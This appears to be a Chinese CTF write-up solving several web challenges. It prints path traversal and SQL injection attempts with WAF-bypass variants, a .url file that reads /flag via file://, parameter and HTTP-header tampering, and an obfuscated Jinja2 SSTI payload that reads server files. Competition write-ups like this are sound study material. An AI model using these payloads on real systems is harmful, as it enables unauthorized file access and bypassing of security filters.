Top10大考察
好多功能啊,都想试试
| 功能 | URL | 说明 |
|---|---|---|
| 主页 | home.php | 显示我的笔记列表 |
| 新建笔记 | note.php | 创建/查看/删除笔记,参数 ?id=N |
| 搜索 | search.php | 搜索笔记,参数 ?q=keyword,提示"已启用WAF" |
| 文件上传 | upload.php | 上传图片或 .url 文件 |
| 文件分享 | share.php | 查看已上传文件内容,参数 ?file=path |
尝试路径遍历
share.php?file=../../../flag.txt,返回:
路径遍历攻击已被拦截!
尝试 ....//、%2e%2e%2f 等 bypass 均被拦截
尝试sql
提示"已启用 WAF 防护"。测试:
- ' OR 1=1-- - → 返回空结果(无报错,可能参数化查询或被过滤) - ' UNION SELECT 1,2,3-- - → WAF拦截! - UN/**/ION SEL/**/ECT → 绕过WAF但依然空结果尝试SSTI
{{7*7}}原样显示
尝试文件上传
仅允许上传 jpg/jpeg/gif/png 图片和 .url 快捷方式文件。图片上传检验 MIME 类型。
.url 文件格式是Windows快捷方式文件
[InternetShortcut] URL=file:///flag访问 share.php?file=uploads/{hash}.url,返回:
<pre>flag{SSRF_WAF_Byp4ss_Curl_Url_2026Summer}</pre>偷吃蟠桃
小游戏玩一下,第二关要1000000分才能拿flag,但总分全拿到也没这么多
查看源代码,找到传参格式
我们POST
score=1000000&level=2&passed=1拿到flag
狗黑子的股市之路
抓包看看,设置负数没反应,repeat重新发包金额也不变
扫目录发现有flag.php能兑换flag但提示资金不足
不过抓flag.php兑换flag的包发现post传参check=no
改成check=yes就拿到flag了
路飞的HTTP协议冒险
第一关要吃肉,点击一次吃一块
抓包改meat=999就ok
然后第二关说
香克斯:路飞,你需要获得橡胶(rubber)的力量(power)才可以变强。
半天想不出来是什么
应该是get请求
/devil_fruit.php?power=rubber进入下一关
血液流速: 过低 ✖ 限制器状态: 未解除 ✖拿hint
罗宾:路飞,你需要让血液(blood)加速(boost),并将身体机能的限制(limit)解除(unlock)来进入二档打败cp9.post传参
blood=boost&limit=unlock提示二档开启成功
进入下一关
拿hint
弗兰奇:路飞,男人就该用点“特别的方式”沟通!比如带上值为 BoneInflate的请求头X-Luffy-Gear3.加http头
X-Luffy-Gear3: BoneInflate进入下一关,拿hint
雷利:路飞,修行的证明,往往留在浏览器里。你需要gear4和Trainer的认证,记住,我是海贼王罗杰的副手Rayleigh,期待着你化身BoundMan的模样认证?抓包看看没有东西,加个cookie试试
gear4=BoundMan; Trainer=Rayleigh进入最后一关
在甚平的注视下,你试图清除那段盘踞心底的战争阴影。 可这道封印并不像刀剑可斩、火焰可焚。 它仿佛在等待一种更“准确”的确认。 当前状态: 封印仍存在 ✖ 本次方式: GET 净化受阻 这道封印并不排斥你的到来,但它不会因旁观而消散。hint
甚平:路飞,清除之前,先确认它仍是当前状态。否则,这道封印不会接受你的请求。不知道改干嘛了
注意到回显中有本次方式:GET
改成POST请求,回显也相应变成POST
那换成DELETE呢?
当前状态: 封印仍存在 ✖ 本次方式: DELETE 条件确认: 缺失 ✖ 净化失败 甚平低声道:真正的斩断,不是盲目出手。先确认你面对的,正是当前这一道封印。要确认面对的是当前这一道封印...
换成PUT
方式错误 你尝试了某种方式,但这道封印并不会对此作出回应。其他的请求方法也都一样
其实问题出在响应头
Etag: "seal-memory-v1"Etag通常用来作为当前资源的实体标签(需要用来确认状态)
结合要确认你面对的正是这一道封印
| 需求 | 对应的请求头 |
|---|---|
| 确认资源没变再读取 | If-None-Match |
| 确认资源没变再修改/删除 | If-Match |
| 确认资源没变再读取(时间版) | If-Unmodified-Since |
使用If-Match头
If-Match: "seal-memory-v1"请求方法设为DELETE
flag{15b606dc5a9492c260984aa627338bfd}dariy
首页好大的字
Record your thoughts with our fancy template system直接七七四十九发现成功
尝试拿flag,有waf
paylaod
{{ (url_for|attr('\x5f\x5fglobals\x5f\x5f'))['sys'].modules['builtins']|attr('open')('/flag')|attr('read')() }}构造思路:
我先测了 {{url_for}},能正常回显,说明它可以当跳板。
然后用 attr 过滤器去读它的globals:
{{url_for|attr('\x5f\x5fglobals\x5f\x5f')}}